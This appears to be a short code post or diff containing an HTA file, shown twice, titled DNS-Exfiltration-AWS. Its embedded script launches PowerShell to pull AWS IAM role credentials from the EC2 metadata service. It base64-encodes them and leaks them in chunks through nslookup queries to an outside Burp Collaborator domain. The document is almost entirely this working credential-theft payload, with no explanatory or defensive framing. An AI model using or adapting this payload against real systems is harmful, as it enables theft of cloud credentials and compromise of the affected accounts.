hateshape · October 12, 2019 15:32
diff --git a/DNS-Exfiltration-AWS.hta b/DNS-Exfiltration-AWS.hta
 <html><head><meta name=ProgId content=htafile></head>
 <hta:application id=x><script>
 try { if (x.commandLine != ""){
 new ActiveXObject('WScript.Shell').Run("powershell.exe -command $a=Invoke-RestMethod -Uri http://169.254.169.254/latest/
 meta-data/iam/security-credentials/aws-ec2-role;$b=($a|Out-String);$c=[System.Text.Encoding]::UTF8.GetBytes($b);$d=[Syst
 em.Convert]::ToBase64String($c);$e=($d -split '(.{50})'| ? {$_});for ($i=0;$i -lt $e.Length; $i++) { $f=$e[$i]+'.'+$i.To
 String()+'.s5y5rjxrqu1g4ypp09vzwclb127xvm.burpcollaborator.net';nslookup -type=A $f;sleep(2)}",1)
 }
 }
 catch(ex){ alert('Error');}
 </script>
 </html>
	<html><head><meta name=ProgId content=htafile></head>
	<hta:application id=x><script>
	try { if (x.commandLine != ""){
	new ActiveXObject('WScript.Shell').Run("powershell.exe -command $a=Invoke-RestMethod -Uri http://169.254.169.254/latest/
	meta-data/iam/security-credentials/aws-ec2-role;$b=($a\|Out-String);$c=[System.Text.Encoding]::UTF8.GetBytes($b);$d=[Syst
	em.Convert]::ToBase64String($c);$e=($d -split '(.{50})'\| ? {$_});for ($i=0;$i -lt $e.Length; $i++) { $f=$e[$i]+'.'+$i.To
	String()+'.s5y5rjxrqu1g4ypp09vzwclb127xvm.burpcollaborator.net';nslookup -type=A $f;sleep(2)}",1)
	}
	}
	catch(ex){ alert('Error');}
	</script>
	</html>